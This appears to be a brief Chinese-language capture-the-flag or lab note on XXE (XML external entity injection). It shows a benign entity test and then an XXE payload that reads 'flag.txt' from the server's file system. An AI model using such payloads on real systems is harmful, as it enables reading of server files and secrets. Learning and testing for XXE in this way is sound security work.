XXE(xml外部实体注入漏洞)
概述
提交正常url编码之后的xml数据,显示正常。
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY test "test1">
]>
<name>&test;</name>
提交payload,查看服务器上文件:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C://flag.txt">
]>
<x>&f;</x>